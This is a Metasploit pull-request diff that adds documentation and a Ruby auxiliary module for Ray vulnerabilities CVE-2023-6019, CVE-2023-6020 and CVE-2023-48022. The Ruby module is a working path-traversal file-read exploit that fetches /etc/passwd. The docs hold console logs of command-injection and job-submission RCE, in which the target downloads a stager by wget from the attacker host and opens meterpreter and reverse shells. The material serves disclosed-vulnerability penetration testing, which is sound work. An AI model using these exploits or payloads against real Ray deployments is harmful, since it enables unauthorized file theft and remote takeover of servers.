Land rapid7#19363, Ray Modules CVE-2023-6019 CVE-2023-6020 CVE-2023-48022

Author: dledda-r7

documentation/modules/auxiliary/gather/ray_lfi_cve_2023_6020.md

@@ -0,0 +1,76 @@
+## Vulnerable Application
+
+Ray (<=v2.6.3) is vulnerable to local file inclusion (CVE-2023-6020)
+
+The vulnerability affects:
+
+    * Ray (<=v2.6.3)
+
+This module was successfully tested on:
+
+    * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15
+
+### Install and run the vulnerable Ray (v2.6.3)
+
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Kali Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Ray docker container (v2.6.3) in your VM.
+   `docker pull rayproject/ray:2.6.3`
+4. Start the ray container.
+   `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3`
+5. Start ray.
+   `ray start --head --dashboard-host=0.0.0.0`
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/gather/ray_lfi_cve_2023_6020`
+4. Do: `set rhost <rhost>`
+5. Do: `run`
+6. You should get a file content
+
+## Options
+
+### FILEPATH (Required)
+
+This is the file to read. Default is `/etc/passwd`.
+
+## Scenarios
+
+### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15
+```
+msf6 > use auxiliary/gather/ray_lfi_cve_2023_6020
+msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > check
+[+] 192.168.56.6:8265 - The target is vulnerable.
+msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > run
+[*] Running module against 192.168.56.6
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+ray:x:1000:100::/home/ray:/bin/bash
+
+[*] Auxiliary module execution completed
+```

documentation/modules/exploit/linux/http/ray_agent_job_rce.md

@@ -0,0 +1,103 @@
+## Vulnerable Application
+
+Ray (<=v2.6.3) is vulnerable to RCE via the agent job submission endpoint (CVE-2023-48022)
+
+The vulnerability affects:
+
+    * Ray (<=v2.6.3)
+
+This module was successfully tested on:
+
+    * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15
+
+### Install and run the vulnerable Ray (v2.6.3)
+
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Kali Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Ray docker container (v2.6.3) in your VM.
+   `docker pull rayproject/ray:2.6.3`
+4. Start the ray container.
+   `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3`
+5. Start ray.
+   `ray start --head --dashboard-host=0.0.0.0`
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/ray_agent_job_rce`
+4. Do: `set rhost <rhost>`
+5. Do: `set lhost <attacker-ip>`
+6. Do: `run`
+7. You should get a shell or meterpreter
+
+## Options
+No options
+
+## Scenarios
+
+### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0)
+```
+msf6 > use exploit/linux/http/ray_agent_job_rce
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/ray_agent_job_rce) > check
+[*] 192.168.56.6:8265 - The service is running, but could not be validated.
+msf6 exploit(linux/http/ray_agent_job_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[+] Command execution successful. Job ID: 'raysubmit_EJDSK2BrhAP8j69n' Submission ID: 'raysubmit_EJDSK2BrhAP8j69n'
+[*] Using URL: http://192.168.56.1:8080/kOZWO5HA3wWm2Hh
+[*] Command Stager progress - 100.00% done (120/120 bytes)
+[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /kOZWO5HA3wWm2Hh
+[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
+[*] Sending stage (3045380 bytes) to 192.168.56.6
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:42052) at 2024-08-10 10:45:48 +0900
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Ubuntu 20.04 (Linux 6.6.15-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1)
+```
+msf6 > use exploit/linux/http/ray_agent_job_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/ray_agent_job_rce) > set target 1
+target => 1
+msf6 exploit(linux/http/ray_agent_job_rce) > set payload linux/x86/shell/reverse_tcp
+payload => linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/ray_agent_job_rce) > check
+[*] 192.168.56.6:8265 - The service is running, but could not be validated.
+msf6 exploit(linux/http/ray_agent_job_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[+] Command execution successful. Job ID: 'raysubmit_RNpiJJt2feNrUrwN' Submission ID: 'raysubmit_RNpiJJt2feNrUrwN'
+[*] Using URL: http://192.168.56.1:8080/QtpKXmqA8kq
+[*] Command Stager progress - 100.00% done (116/116 bytes)
+[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /QtpKXmqA8kq
+[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
+[*] Sending stage (36 bytes) to 192.168.56.6
+[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:35136) at 2024-08-10 10:47:37 +0900
+[*] Server stopped.
+
+whoami
+ray
+pwd
+/home/ray
+```

documentation/modules/exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.md

@@ -0,0 +1,103 @@
+## Vulnerable Application
+
+Ray (<=v2.6.3) is vulnerable to RCE via cpu_profile command injection vulnerability (CVE-2023-6019)
+
+The vulnerability affects:
+
+    * Ray (<=v2.6.3)
+
+This module was successfully tested on:
+
+    * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15
+
+### Install and run the vulnerable Ray (v2.6.3)
+
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Kali Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Ray docker container (v2.6.3) in your VM.
+   `docker pull rayproject/ray:2.6.3`
+4. Start the ray container.
+   `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3`
+5. Start ray.
+   `ray start --head --dashboard-host=0.0.0.0`
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019`
+4. Do: `set rhost <rhost>`
+5. Do: `set lhost <attacker-ip>`
+6. Do: `run`
+7. You should get a shell or meterpreter
+
+## Options
+No options
+
+## Scenarios
+
+### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0)
+```
+msf6 > use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > check
+[*] 192.168.56.6:8265 - The service is running, but could not be validated.
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[+] Grabbed node info, pid: 129, ip: 172.17.0.2
+[*] Using URL: http://192.168.56.1:8080/2W4ZJ30NqjnfoGE
+[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /2W4ZJ30NqjnfoGE
+[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
+[*] Sending stage (3045380 bytes) to 192.168.56.6
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:59072) at 2024-08-10 10:29:05 +0900
+[*] Command Stager progress - 100.00% done (120/120 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Ubuntu 20.04 (Linux 6.6.15-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1)
+```
+msf6 > use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set target 1
+target => 1
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set payload linux/x86/shell/reverse_tcp
+payload => linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > check
+[*] 192.168.56.6:8265 - The service is running, but could not be validated.
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[+] Grabbed node info, pid: 129, ip: 172.17.0.2
+[*] Using URL: http://192.168.56.1:8080/Mz2SC2mlSp
+[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /Mz2SC2mlSp
+[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
+[*] Sending stage (36 bytes) to 192.168.56.6
+[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:59210) at 2024-08-10 10:30:49 +0900
+[*] Command Stager progress - 100.00% done (115/115 bytes)
+[*] Server stopped.
+
+whoami
+ray
+pwd
+/home/ray
+```

modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb

@@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ray static arbitrary file read',
+        'Description' => %q{
+          Ray before 2.8.1 is vulnerable to a local file inclusion.
+        },
+        'Author' => [
+          'byt3bl33d3r <[email protected]>', # Python Metasploit module
+          'danmcinerney <[email protected]>',     # Python Metasploit module
+          'Takahiro Yokoyama'                     # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2023-6020'],
+          ['URL', 'https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/'],
+          ['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray']
+        ],
+        'DisclosureDate' => '2023-11-15',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ IOC_IN_LOGS, ],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8265),
+        OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/version')
+    })
+    return Exploit::CheckCode::Unknown unless res && res.code == 200
+
+    ray_version = res.get_json_document['ray_version']
+
+    return Exploit::CheckCode::Unknown unless ray_version
+
+    return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3')
+
+    file_content = lfi('/etc/passwd')
+    return Exploit::CheckCode::Vulnerable unless file_content.nil?
+
+    Exploit::CheckCode::Appears
+  end
+
+  def lfi(filepath)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{filepath}")
+    })
+    return unless res && res.code == 200
+
+    res.body
+  end
+
+  def run
+    file_content = lfi(datastore['FILEPATH'])
+    fail_with(Failure::Unknown, 'Failed to execute LFI') unless file_content
+    print_good("#{datastore['FILEPATH']}\n#{file_content}")
+  end
+
+end